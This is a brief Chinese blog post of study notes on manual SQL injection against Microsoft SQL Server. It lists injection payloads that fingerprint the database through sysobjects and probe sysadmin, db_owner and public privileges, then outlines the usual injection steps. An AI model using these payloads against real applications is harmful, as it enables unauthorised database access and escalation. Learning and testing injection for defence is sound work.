Microsoft SQL Server手注

与mysql主要不同是在语法
判断是否为Mssql数据库
and exists(select * from sysobjects) --
判断权限

and 1=(select is_srvrolemember('sysadmin')) //sa权限:数据库操作,⽂件管理,命令执⾏,注册表读取等 system
 and 1=(select is_srvrolemember('db_owner')) //db权限:⽂件管理,数据库操作等 users-adminstrators
 and 1=(select is_srvrolemember('public')) //public权限:数据库操作 guest-users

注入流程基本一致
1.判断注入
2.字段长度
3.寻找字符型显位
4.查询
借鉴一篇佳作https://www.naraku.cn/posts/67.html

posted @ 2021-04-21 00:16  0x00Guem-lulu  阅读(53)  评论(0)    收藏  举报